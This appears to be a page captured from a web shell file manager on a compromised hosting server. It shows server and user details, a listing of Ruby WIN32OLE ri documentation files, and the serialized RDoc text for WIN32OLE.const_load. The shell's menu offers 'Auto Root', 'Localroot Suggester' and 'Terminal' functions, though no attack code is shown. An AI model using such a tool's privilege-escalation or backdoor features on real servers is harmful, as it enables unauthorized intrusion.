Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
WIN32OLE /
Delete
Unzip
Name
Size
Permission
Date
Action
Event
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Method
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Param
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Record
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Type
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Typelib
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
VARIANT
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Variable
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Variant
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
%5b%5d%3d-i.ri
855
B
-rw-r--r--
2026-04-07 17:42
%5b%5d-i.ri
838
B
-rw-r--r--
2026-04-07 17:42
_getproperty-i.ri
766
B
-rw-r--r--
2026-04-07 17:42
_invoke-i.ri
718
B
-rw-r--r--
2026-04-07 17:42
_setproperty-i.ri
793
B
-rw-r--r--
2026-04-07 17:42
cdesc-WIN32OLE.ri
5.18
KB
-rw-r--r--
2026-04-07 17:42
codepage%3d-c.ri
702
B
-rw-r--r--
2026-04-07 17:42
codepage-c.ri
419
B
-rw-r--r--
2026-04-07 17:42
connect-c.ri
638
B
-rw-r--r--
2026-04-07 17:42
const_load-c.ri
1.4
KB
-rw-r--r--
2026-04-07 17:42
create_guid-c.ri
441
B
-rw-r--r--
2026-04-07 17:42
each-i.ri
664
B
-rw-r--r--
2026-04-07 17:42
invoke-i.ri
757
B
-rw-r--r--
2026-04-07 17:42
locale%3d-c.ri
537
B
-rw-r--r--
2026-04-07 17:42
locale-c.ri
507
B
-rw-r--r--
2026-04-07 17:42
method_missing-i.ri
382
B
-rw-r--r--
2026-04-07 17:42
methods-i.ri
601
B
-rw-r--r--
2026-04-07 17:42
new-c.ri
1.05
KB
-rw-r--r--
2026-04-07 17:42
ole_activex_initialize-i.ri
969
B
-rw-r--r--
2026-04-07 17:42
ole_free-c.ri
557
B
-rw-r--r--
2026-04-07 17:42
ole_free-i.ri
505
B
-rw-r--r--
2026-04-07 17:42
ole_func_methods-i.ri
609
B
-rw-r--r--
2026-04-07 17:42
ole_get_methods-i.ri
605
B
-rw-r--r--
2026-04-07 17:42
ole_method-i.ri
605
B
-rw-r--r--
2026-04-07 17:42
ole_method_help-i.ri
571
B
-rw-r--r--
2026-04-07 17:42
ole_methods-i.ri
563
B
-rw-r--r--
2026-04-07 17:42
ole_methods_safely-i.ri
270
B
-rw-r--r--
2026-04-07 17:42
ole_obj_help-i.ri
483
B
-rw-r--r--
2026-04-07 17:42
ole_put_methods-i.ri
605
B
-rw-r--r--
2026-04-07 17:42
ole_query_interface-i.ri
719
B
-rw-r--r--
2026-04-07 17:42
ole_reference_count-c.ri
533
B
-rw-r--r--
2026-04-07 17:42
ole_respond_to%3f-i.ri
591
B
-rw-r--r--
2026-04-07 17:42
ole_show_help-c.ri
652
B
-rw-r--r--
2026-04-07 17:42
ole_type-i.ri
503
B
-rw-r--r--
2026-04-07 17:42
ole_typelib-i.ri
677
B
-rw-r--r--
2026-04-07 17:42
setproperty-i.ri
745
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI"const_load:ETI"WIN32OLE::const_load;TT:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"HDefines the constants of OLE Automation server as mod's constants. ;TI"AThe first argument is WIN32OLE object or type library name. ;TI":If 2nd argument is omitted, the default is WIN32OLE. ;TI"FThe first letter of Ruby's constant variable name is upper case, ;TI"Bso constant variable name of WIN32OLE object is capitalized. ;TI"FFor example, the 'xlTop' constant of Excel is changed to 'XlTop' ;TI"in WIN32OLE. ;TI"AIf the first letter of constant variable is not [A-Z], then ;TI"7the constant is defined as CONSTANTS hash element.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"module EXCEL_CONST ;TI" end ;TI"/excel = WIN32OLE.new('Excel.Application') ;TI"-WIN32OLE.const_load(excel, EXCEL_CONST) ;TI"(puts EXCEL_CONST::XlTop # => -4160 ;TI"Fputs EXCEL_CONST::CONSTANTS['_xlDialogChartSourceData'] # => 541 ;TI" ;TI" WIN32OLE.const_load(excel) ;TI"%puts WIN32OLE::XlTop # => -4160 ;TI" ;TI"module MSO ;TI" end ;TI"EWIN32OLE.const_load('Microsoft Office 9.0 Object Library', MSO) ;TI"#puts MSO::MsoLineSingle # => 1;T:@format0: @fileI"ext/win32ole/win32ole.c;T:0@omit_headings_from_table_of_contents_below0I"/WIN32OLE.const_load( ole, mod = WIN32OLE) ;T0[ I"(p1, p2 = v2);T@'FI" WIN32OLE;TcRDoc::NormalClass00